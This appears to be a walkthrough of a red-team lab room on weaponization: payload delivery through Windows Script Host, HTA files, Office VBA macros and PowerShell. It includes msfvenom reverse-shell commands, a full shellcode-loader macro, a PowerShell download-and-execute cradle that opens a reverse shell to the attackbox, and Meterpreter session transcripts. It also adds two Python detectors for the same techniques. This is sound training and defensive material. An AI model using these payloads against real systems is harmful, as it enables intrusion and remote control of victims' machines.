
0202 | Weaponization

Red Teaming | Weaponization | Summary:

The room focuses on alternative scripting techniques used by red teamers to execute payloads in a Windows environment.

Since many organizations restrict or monitor the execution of .exe files, this room explores other methods, including Windows Script Host, HTML Applications, Visual Basic Applications, and PowerShell.

The goal is to learn and practice these techniques, which are commonly used by attackers to bypass security controls and execute malicious code.


Learning Objectives

  • The Windows Script Host (WSH)
  • An HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

1 | Introduction

Red Team Toolkits

Red-Teaming-Toolkit | initial access, payload development, delivery methods...

Weaponization is the second stage of the Cyber Kill Chain model, following Reconnaissance. In this phase, attackers create their own malicious code using payloads like Word documents or PDFs to exploit target machines and gain initial access. As many organizations use Windows OS and block .exe files for security, red teamers use alternative methods such as phishing campaigns, social engineering, browser exploitation, USB, or web-based attacks.

Common techniques used during weaponization include:

  • The Windows Script Host (WSH)
  • HTML Applications (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

These methods allow attackers to execute payloads without relying on .exe files, which are often monitored or blocked in controlled environments.

2 | Windows Scripting Host (WSH)

Windows Scripting Host (WSH) is a built-in Windows tool for automating and managing tasks through scripts written in Microsoft Visual Basic Script (VBScript). It consists of cscript.exe for command-line scripts and wscript.exe for scripts with UI elements. VBScript runs with the permissions of the current user, so no elevation is required, which makes it useful for red teaming.

cscript.exe (command line) vs. wscript.exe (ui script)

When writing a script for WSH, you should choose between cscript.exe and wscript.exe based on whether your script requires interactive GUI elements or simply needs to execute commands without user intervention.

  1. First, open up a cmd and navigate to your Desktop.
     : navigate to desktop
     cd C:\Users\thm\Desktop
     : create hello.vbs
     echo. >hello.vbs
     : edit the file with notepad
     notepad hello.vbs
  2. Paste in the following demo code.
     '<hello.vbs>
     Dim message
     message = "Welcome to THM"
     MsgBox message
  3. Run it.
     wscript hello.vbs
  4. Next, continue with payload.vbs.
     : create a file
     echo. >payload.vbs
     : edit it with notepad
     notepad payload.vbs
  5. Paste in the following demo code.
     '<payload.vbs>
     Set shell = WScript.CreateObject("Wscript.Shell")
     shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
  6. Run it.
     wscript payload.vbs
  7. Rename payload.vbs to payload.txt.
     rename payload.vbs payload.txt
  8. Rerun it, but this time explicitly define the script engine; once the engine is given with /e:, WSH no longer relies on the file extension to decide how to run the file.
     wscript /e:VBScript c:\users\thm\desktop\payload.txt

3 | An HTML Application (HTA)

An HTML Application (HTA) is a self-contained file combining HTML, scripts (e.g., JavaScript, VBScript), and other resources. It allows for dynamic web-like content in a single downloadable executable. HTAs are typically executed with the mshta tool (a LOLBIN, Living-off-the-land Binary), which is run either manually or automatically by the web browser. They enable the creation of installers, configuration tools, or other applications that need all their components in one file.

HTA PoC | Local

HTA PoC payload for local cmd.exe execution

  • Step-1 | Create the HTA payload (on attackbox)
    • Create the HTA payload file ("payload.hta") on our attackbox (kali in my case).
      # change to Desktop
      cd Desktop
      # create the hta file
      touch payload.hta
      # copy and paste the payload into the file
      vim payload.hta
    • HTA PoC payload for opening cmd.exe with ActiveXObject
      <html>
      <body>
      <script>
      var c = 'cmd.exe';
      new ActiveXObject('WScript.Shell').Run(c);
      </script>
      </body>
      </html>
  • Step-2 | Serve up the payload via a python web server (on attackbox)
    # in the same directory where our payload.hta file is resting
    python3 -m http.server 8090
    # wait for connections
  • Step-3 | Download and execute the payload (on targetbox)
    • Use the provided browser (Edge) and head over to where your payload is served
      http://<attackbox-ip>:8090
    • Click on our HTA payload file, and select "Run"
    • If everything worked correctly, a cmd.exe window should pop up for us.

HTA PoC | Reverse Shell

HTA Reverse Connection | Python Web Server

Quote | Port 443 requires root privileges

"On the attacking machine, we need to listen to the port 443 using nc. Please note this port needs root privileges to open, or you can use different ones."

  • Step-1 | Create the reverse shell HTA payload with msfvenom (on attackbox)
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attackbox-ip> LPORT=443 -f hta-psh -o thm.hta
  • Step-2 | Start the listener (on attackbox)
    sudo nc -lvp 443
  • Step-3 | Serve up the payload with a python web server (on attackbox)
    # in the same directory where our reverse shell payload (thm.hta) is located
    python3 -m http.server 8090
  • Step-4 | Download and run the HTA reverse shell payload (on target box)
    • Use the provided browser (Edge) and head over to where your payload is served
      http://<attackbox-ip>:8090
    • Click on our HTA payload file, and select "Run"
  • Step-5 | Catch our reverse shell (on attackbox)
    • Make sure you caught the reverse connection back to the attackbox with the netcat listener and that you have a shell on the target box. Here is an example of how the terminal interaction might look:
      ┌──(kali㉿kali)-[~]
      └─$ sudo nc -lvp 443
      listening on [any] 443 ...
      10.10.55.169: inverse host lookup failed: Unknown host
      connect to [10.14.95.186] from (UNKNOWN) [10.10.55.169] 50173
      Microsoft Windows [Version 10.0.14393]
      (c) 2016 Microsoft Corporation. All rights reserved.

      C:\Users\thm\Downloads>whoami
      whoami
      desktop-1au6nt4\thm

      C:\Users\thm\Downloads>

HTA Reverse Connection | Metasploit hta_server module

  • Step-1 | Fire up Metasploit (on attackbox)

    msfconsole -q
  • Step-2 | Select and configure the hta_server module

    # select the module (its path also appears in the msf6 prompt of the transcript further down)
    use exploit/windows/misc/hta_server

    # configure the listener (attackbox)
    set LHOST <attackbox-ip>
    set LPORT 443

    # configure the local host to listen on
    set SRVHOST <attackbox-ip>
    # SRVPORT is set to 8080 by default

    # configure the payload and target
    set payload windows/meterpreter/reverse_tcp
    # meterpreter only compatible with x86 payload

    # configure uri and ssl (optional)
    set uripath /verynicecatpicture.png

    # check configuration
    options
  • Step-3 | Run the HTA Web Server and copy your target URL (on attackbox)

    # properly selected and configured module
    run
    # ...
    # copy the target url
    # here: http://<attackbox>:8080/verynicecatpicture.png
  • Step-4 | Open the Target URL (on targetbox)

    • Use the provided browser (Edge) and head over to where your payload is served
      http://<attackbox>:8080/verynicecatpicture.png
    • Click on our HTA payload file, and select "Run"
  • Step-5 | Catch the reverse shell with Metasploit (on attackbox)

    • If everything worked correctly, a new meterpreter session should have been opened for us
    • Check out the opened session and look around
      # check out the open sessions in metasploit
      sessions
      # grab the session id responsible for the connection to the targetbox (example: 1)

      # interact with the open session -- with session id=1 --> sessions -i 1
      sessions -i <session-id>

      # check out the user account we are using on the targetbox
      getuid
    • Here is an example of how the complete terminal interaction may look:
      msf6 exploit(windows/misc/hta_server) > 
      [*] 10.10.55.169 hta_server - Delivering Payload
      [*] Sending stage (177734 bytes) to 10.10.55.169
      [*] Meterpreter session 1 opened (10.14.95.186:443 -> 10.10.55.169:50431) at 2025-01-26 11:16:16 +0000

      msf6 exploit(windows/misc/hta_server) > sessions

      Active sessions
      ===============

      Id  Name  Type                     Information                             Connection
      --  ----  ----                     -----------                             ----------
      1         meterpreter x86/windows  DESKTOP-1AU6NT4\thm @ DESKTOP-1AU6NT4   10.14.95.186:443 -> 10.10.55.169:50431 (10.10.55.169)

      msf6 exploit(windows/misc/hta_server) > sessions -i 1
      [*] Starting interaction with 1...

      meterpreter > whoami
      [-] Unknown command: whoami. Run the help command for more details.
      meterpreter > getuid
      Server username: DESKTOP-1AU6NT4\thm
      meterpreter >

4 | Visual Basic for Applications (VBA)

Quote | Combining VBAs with other methods

"It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections."

Visual Basic for Applications (VBA) is a programming language developed by Microsoft, integrated into applications like Word, Excel, and PowerPoint. It enables automation of nearly all keyboard and mouse interactions within these office programs. VBA is used to create macros - custom functions that automate repetitive tasks to save time. A notable feature of VBA is its ability to access the Windows Application Programming Interface (API) for low-level functionality.

VBA PoC | Local Actions

VBA PoC (display msg) | Run Manually

  • Step-1 | Open Microsoft Word and create a blank document.
    • You could save it as Word 97-2003 Document with "thm" for the File name.
  • Step-2 | Create the Macro.
    • Select "View" > "Macros" > "View Macros" and add a new macro
      • Macro name: THM
      • Macros in: Document1 (document) (if still unsaved and unnamed)
      • Select "Create"
    • Edit the macro
      • Select "Edit" > the Visual Basic for Applications editor will open
      • Add PoC code to display a message
        Sub THM()
        MsgBox ("Welcome to Weaponization Room!")
        End Sub
  • Step-3 | Run the Macro.
    • Select "Macros" > "View Macros" > Select created Macro (THM) > "Run"

VBA PoC (display msg) | Run Automatically

  • Step-1 | Same as before
  • Step-2 | Similar to the one before, but modify the macro
    • Modify the Macro to execute the code automatically once the document gets opened
      Sub Document_Open()
      THM
      End Sub

      Sub AutoOpen()
      THM
      End Sub

      Sub THM()
      MsgBox ("Welcome to Weaponization Room!")
      End Sub
  • Step-3 | Save the document, close it, and open it again
    Macro Security Message

    The first time the Macro tries to run, a security message will pop up indicating that Macros have been disabled and offers the option to enable it.

    • Save it as Word 97-2003 Document with "thm" for the File name.
    • Close the document and edit windows.
    • Reopen the document.
    • Enable Macros

VBA PoC (run calc.exe) | Run Automatically

  • Step-1 | Same as before
  • Step-2 | Similar to the one before, but modify the macro
    PoC Code Breakdown
    • Dim payload As String | declare the payload variable as a string
    • payload = "calc.exe" | specify the payload name
    • CreateObject("Wscript.Shell").Run payload | create a WSH object and run the payload
    • Modify the Macro to execute calc.exe automatically once the document gets opened
      Sub Document_Open()
      PoC
      End Sub

      Sub AutoOpen()
      PoC
      End Sub

      Sub PoC()
      Dim payload As String
      payload = "calc.exe"
      CreateObject("Wscript.Shell").Run payload,0
      End Sub
  • Step-3 | Same as before, only there is no need to enable macros again

VBA PoC | Reverse Shell

  • Step-1 | Create the macro payload with msfvenom (on attackbox)
    • Create the VBA payload with metasploit
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attackbox-ip> LPORT=443 -f vba
      • Here is an example of how this payload might look:
        ┌──(kali㉿kali)-[~/Desktop]
        └─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.95.186 LPORT=443 -f vba
        [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        [-] No arch selected, selecting arch: x86 from the payload
        No encoder specified, outputting raw payload
        Payload size: 354 bytes
        Final size of vba file: 2707 bytes
        #If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Wrkqiwca As Long, ByVal Dgdxg As Long, ByVal Npvk As LongPtr, Hklzyvndg As Long, ByVal Njlhn As Long, Kuqqjct As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Jefnukei As Long, ByVal Ldrtdbe As Long, ByVal Bxf As Long, ByVal Mtdse As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Gvsijschj As LongPtr, ByRef Qvaqarnr As Any, ByVal Dcuyxjej As Long) As LongPtr
        #Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Wrkqiwca As Long, ByVal Dgdxg As Long, ByVal Npvk As Long, Hklzyvndg As Long, ByVal Njlhn As Long, Kuqqjct As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Jefnukei As Long, ByVal Ldrtdbe As Long, ByVal Bxf As Long, ByVal Mtdse As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Gvsijschj As Long, ByRef Qvaqarnr As Any, ByVal Dcuyxjej As Long) As Long
        #EndIf

        Sub Auto_Open()
        Dim Enpew As Long, Dsfmfn As Variant, Aeyj As Long
        #If Vba7 Then
        Dim Pcyg As LongPtr, Yqz As LongPtr
        #Else
        Dim Pcyg As Long, Yqz As Long
        #EndIf
        Dsfmfn = Array(252,232,143,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,49,255,139,114,40,15,183,74,38,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,88,32,139,72,24,80,1,211,133,201,116,60,73,139, _
        52,139,1,214,49,255,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
        104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,10,14,95,186,104,2,0,1,187,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
        106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
        94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

        Pcyg = VirtualAlloc(0, UBound(Dsfmfn), &H1000, &H40)
        For Aeyj = LBound(Dsfmfn) To UBound(Dsfmfn)
        Enpew = Dsfmfn(Aeyj)
        Yqz = RtlMoveMemory(Pcyg + Aeyj, Enpew, 1)
        Next Aeyj
        Yqz = CreateThread(0, 0, Pcyg, 0, 0, 0)
        End Sub
        Sub AutoOpen()
        Auto_Open
        End Sub
        Sub Workbook_Open()
        Auto_Open
        End Sub


        ┌──(kali㉿kali)-[~/Desktop]
        └─$
  • Step-2 | Adjust VBA PoC payload for MS word instead of MS Excel (on attackbox)
    • Change Workbook_Open() to Document_Open() to make it suitable to MS Word Documents
      • Before the Adjustment
        ...<OMITTED-FOR-BREVITY>...
        Sub Workbook_Open()
        Auto_Open
        End Sub
      • After the Adjustment
        ...<OMITTED-FOR-BREVITY>...
        Sub Document_Open()
        Auto_Open
        End Sub
  • Step-3 | Copy the payload, save it into the macro editor (attackbox -> targetbox)
  • Step-4 | Set up a listener (on attackbox)
    # run msfconsole
    msfconsole -q
    # select the multi handler module for catching our reverse shell connection
    use exploit/multi/handler
    # adjust the payload type to match the one we generated with msfvenom for the VBA payload
    set payload windows/meterpreter/reverse_tcp

    # configure local host
    set LHOST <attackbox-ip>
    set LPORT 443

    # run the listener
    run
  • Step-5 | Open the document | trigger the payload execution (on targetbox)
  • Step-6 | Catch the reverse shell (on attackbox)
    • Check out the opened sessions in your listener
    • example | this is how it might look
      ...<OMITTED-FOR-BREVITY>...
      [*] Started reverse TCP handler on 10.14.95.186:443
      [*] Sending stage (177734 bytes) to 10.10.10.117
      [*] Meterpreter session 1 opened (10.14.95.186:443 -> 10.10.10.117:50847) at 2025-01-26 16:20:45 +0000

      meterpreter > getuid
      Server username: DESKTOP-1AU6NT4\thm
      meterpreter >
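The msfvenom output above shows the shape of a shellcode-loader macro: kernel32 Declare statements for VirtualAlloc, RtlMoveMemory and CreateThread, a long integer Array, and auto-execute entry points (Auto_Open, AutoOpen, Workbook_Open or Document_Open) so the stub fires on open. A defender triaging a suspicious document can key on exactly those traits once the VBA source has been extracted. The Python below is an added example, not code from the room or from Metasploit; the three macro samples are constructed, the array in the first one holds placeholder values rather than shellcode, and the rule names and the 32-entry threshold are my own choices.

```python
"""Static triage of VBA macro source text (added example, not the room's or
Metasploit's code). Flags the traits of the msfvenom-style loader macro above:
auto-execute entry points, kernel32 imports for running shellcode in memory, a
long byte array, and WScript.Shell use. Input is already-extracted VBA text."""
import re

# Procedure names Office runs on open/close without user interaction.
AUTO_EXEC = {n.lower(): n for n in (
    "AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open", "AutoExec", "AutoClose")}
# Win32 imports that, combined, indicate an in-memory shellcode loader.
LOADER_APIS = {n.lower(): n for n in (
    "VirtualAlloc", "VirtualAllocEx", "RtlMoveMemory", "WriteProcessMemory",
    "CreateThread", "CreateRemoteThread")}
SHELL_OBJECTS = ("wscript.shell", "shell.application")
MIN_BYTE_ARRAY = 32  # my own threshold; the msfvenom array above has several hundred entries

SUB_RE = re.compile(r"^\s*(?:private\s+|public\s+)?sub\s+(\w+)\s*\(", re.I | re.M)
DECLARE_RE = re.compile(r'declare\s+(?:ptrsafe\s+)?function\s+(\w+)\s+lib\s+"(\w+)"', re.I)
ARRAY_RE = re.compile(r"array\s*\(([\d,\s_]+)\)", re.I)  # " _" is VBA line continuation


def analyze_macro(src):
    """Return findings and a coarse verdict for one macro module."""
    low = src.lower()
    subs = {s.lower() for s in SUB_RE.findall(src)}
    auto_exec = sorted(AUTO_EXEC[s] for s in subs if s in AUTO_EXEC)
    apis = sorted({LOADER_APIS[n.lower()] for n, _lib in DECLARE_RE.findall(src)
                   if n.lower() in LOADER_APIS})
    byte_arrays = []
    for body in ARRAY_RE.findall(src):
        values = [int(v) for v in re.findall(r"\d+", body)]
        if len(values) >= MIN_BYTE_ARRAY and all(v <= 255 for v in values):
            byte_arrays.append(len(values))
    shell_object = any(obj in low for obj in SHELL_OBJECTS)

    if auto_exec and apis and byte_arrays:
        verdict = "shellcode-loader"      # all three loader traits plus an auto-exec trigger
    elif auto_exec and shell_object:
        verdict = "auto-exec-shell"       # like the calc.exe PoC: runs a command on open
    elif auto_exec:
        verdict = "auto-exec"
    else:
        verdict = "benign-looking"
    return {"auto_exec": auto_exec, "api_imports": apis,
            "byte_array_lengths": byte_arrays, "shell_object": shell_object,
            "verdict": verdict}


# Constructed sample 1: same layout as the msfvenom output, but the array holds
# placeholder values 0..31, not shellcode.
LOADER_SAMPLE = r'''
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As LongPtr, D As Long, ByVal E As Long, F As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As Long, ByVal D As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal A As LongPtr, ByRef B As Any, ByVal C As Long) As LongPtr

Sub Auto_Open()
Dim Buf As Variant, P As LongPtr, I As Long, B As Long
Buf = Array(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, _
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31)
P = VirtualAlloc(0, UBound(Buf), &H1000, &H40)
For I = LBound(Buf) To UBound(Buf)
B = Buf(I)
RtlMoveMemory P + I, B, 1
Next I
CreateThread 0, 0, P, 0, 0, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Document_Open()
Auto_Open
End Sub
'''

# Constructed sample 2: the room's calc.exe PoC shape (auto-exec + WScript.Shell).
CALC_SAMPLE = '''
Sub Document_Open()
PoC
End Sub

Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
'''

# Constructed sample 3: an ordinary, manually started macro.
BENIGN_SAMPLE = '''
Sub FormatReport()
MsgBox ("Report formatted")
End Sub
'''

if __name__ == "__main__":
    for name, src in (("loader", LOADER_SAMPLE), ("calc", CALC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze_macro(src))
```

Extracting the VBA from the OLE or OOXML container is a separate step; this scanner expects the plain-text module. The verdict is deliberately coarse: an auto-exec name alone is common in legitimate templates, so it only rises to "shellcode-loader" when the memory-allocation imports and a byte array appear together.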

5 | PowerShell (PSH)

PowerShell (PSH)

PowerShell, also known as PowerShell Core or PSH, is a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework.

It is built on the .NET platform and provides a more powerful and flexible environment than traditional command shells, enabling administrators and developers to automate tasks, configure systems, and manage resources efficiently.

PowerShell supports both cmdlets (commandlets) and .NET objects, providing a wide range of functionalities for managing Windows, Linux, and macOS systems.

PSH PoC | Local

Executing PowerShell Scripts Locally

  • Simple PS script to display a message
    • save it as "thm.ps1"
      Write-Output "Welcome to the Weaponization Room!"
    • try to run it --> it will fail due to the Execution Policy
      powershell -File thm.ps1
    • Check the current Execution Policy
      • by default, it is disabled (Restricted) on Windows
      • Restricted | permits individual commands but not the running of any scripts
      Get-ExecutionPolicy
  • Changing the Execution Policy
    Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
  • Bypass the Execution Policy | run the simple PS script locally
    • bypass | nothing is blocked or restricted
    powershell -ex bypass -File thm.ps1

PSH PoC | Reverse Shell

Get a reverse shell with PowerCat (written in PS)

  • Step-1 | Download PowerCat (on attackbox)
    git clone https://github.com/besimorhino/powercat.git
  • Step-2 | Serve up the PS payload "powercat.ps1" (on attackbox)
    cd powercat
    # serve up the current directory with a python web server | including 'powercat.ps1'
    python3 -m http.server 8080
  • Step-3 | Start the listener (on attackbox)
    nc -lvp 1337
  • Step-4 | Download and execute the PS Payload (on targetbox)
    powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attackbox-ip>:8080/powercat.ps1');powercat -c <attackbox-ip> -p 1337 -e cmd"
  • Step-5 | Catch the reverse shell (on attackbox)
    • Wait for the reverse shell to drop into your netcat listener.
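Each technique in sections 2 to 5 leaves a recognisable process-creation event: wscript or cscript run with /e: against a file whose extension is not a script type, mshta handed a URL or acting as the parent of a shell, an Office application as the parent of cmd, powershell or a script host, and powershell started with -ex bypass or a WebClient/IEX download cradle. The Python below is an added example, not part of the room, that applies those checks to constructed events shaped like Sysmon Event ID 1 records (Image, CommandLine, ParentImage); the paths, the address 192.0.2.10 and the rule names are my own.

```python
"""Process-creation triage for the script-host techniques in this room
(added example, not the room's code). Events are constructed to mirror Sysmon
Event ID 1 fields; rule names are my own."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POLICY_BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|xec|x|p)\s+bypass")
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b")


def _base(path):
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of rule names one event triggers (empty when none)."""
    image, parent = _base(event["Image"]), _base(event["ParentImage"])
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits = []
    if image in SCRIPT_HOSTS:
        # Section 2: the /e: switch lets WSH run a .txt file as VBScript.
        if re.search(r"(?:^|\s)/e:", low):
            hits.append("wsh_engine_override")
        # First argument that is not a /switch is the script path (unquoted paths assumed).
        script_args = [t for t in cmd.split()[1:] if not t.startswith("/")]
        if script_args and ntpath.splitext(script_args[0])[1].lower() not in SCRIPT_EXTS:
            hits.append("wsh_nonscript_extension")
    # Section 3: mshta invoked with a URL, or mshta as the parent of a shell.
    if image == "mshta.exe" and re.search(r"https?://", low):
        hits.append("mshta_remote_url")
    if parent == "mshta.exe" and image in LOLBIN_CHILDREN:
        hits.append("mshta_child_process")
    # Section 4: an Office application should rarely parent a shell or script host.
    if parent in OFFICE_APPS and image in LOLBIN_CHILDREN:
        hits.append("office_child_process")
    # Section 5: execution-policy bypass flag and the WebClient/IEX download cradle.
    if image == "powershell.exe":
        if POLICY_BYPASS_RE.search(low):
            hits.append("psh_execution_policy_bypass")
        if CRADLE_RE.search(low):
            hits.append("psh_download_cradle")
    return hits


def triage(events):
    """Pair every event index with each rule it triggers."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed events (paths, host names and 192.0.2.10 are made up).
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wscript /e:VBScript c:\users\thm\desktop\payload.txt"},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wscript hello.vbs"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://192.0.2.10:8080/verynicecatpicture.png"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -ex bypass -File thm.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10:8080/powercat.ps1');powercat -c 192.0.2.10 -p 1337 -e cmd"'''},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"cmd.exe /c calc.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for index, rule in triage(EVENTS):
        print(f"event {index}: {rule}")
```

Running it prints one line per rule hit; the two negative events (a plain wscript hello.vbs and a scheduled backup script) produce nothing, which is the check that the rules are keyed on the technique rather than on the tool name alone. Real telemetry needs proper command-line quoting and a process-tree lookup instead of the single ParentImage field, but the conditions themselves carry over.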

6 | Command And Control (C2 or C&C)

Command and Control (C2) refers to post-exploitation frameworks used by red teamers to collaborate and manage compromised machines. These tools are crucial during offensive cyber operations. Popular C2 frameworks include:

  • Cobalt Strike | A commercial framework for Adversary Simulations and Red Team Operations, offering advanced techniques like covert communications, key-logging, file transfers, privilege escalation, mimikatz, port scanning, and lateral movement.
  • PowerShell Empire | An open-source framework enabling collaboration across multiple servers using keys and shared passwords. It focuses on client-side and post-exploitation of Windows and Active Directory environments.
  • Metasploit | A widely-used exploitation framework, known as one of the primary tools for pentesting and red team operations. It is open-source and is used in this room for generating payloads during weaponization.

These C2 frameworks often employ techniques covered in this room to prepare for initial access stages.

7 | Delivery Techniques

Delivery techniques are crucial for initial access, requiring professional, legitimate, and convincing approaches. Common methods include:

  • Email Delivery | Sending phishing emails with malicious links or attachments to trick victims into visiting malicious websites or downloading/running files. Red teamers may use their infrastructure (DKIM, SPF, PTR records) or third-party services like Gmail, Outlook. Compromised company email accounts can also be used for targeted phishing.

  • Web Delivery | Hosting payloads on a red team-controlled web server with a clean domain reputation and TLS certificate. Techniques involve social engineering victims to visit or download malicious files, potentially using zero-day exploits or compromised software like Java or browsers. URL shorteners can aid this method.

  • USB Delivery | Physically distributing malicious USB devices at conferences or events. Techniques include Rubber Ducky, USBHarpoon, and charging cables with hidden malware (e.g., O.MG Cable). This method may be effective in environments allowing USB usage, while organizations often restrict it for security reasons.

8 | Migrating with Metasploit

MSFVenom Cheat Sheet

Check out the MSFVenom Cheat Sheet.

Migrating with Metasploit

Quote | Note for Doc files

"the simulation used in the provided Windows 10 machine will open the malicious Word document and be closed within 90 seconds. In order to get longer persistence, you need to migrate as soon as you receive the connection back."

  • idea | migrate our current session into another process on the victim machine
    • example | migrate from the current MS Word process into another process, so the connection stays stable even if the Word document is closed
    # within the meterpreter session (inside msfconsole)
    run post/windows/manage/migrate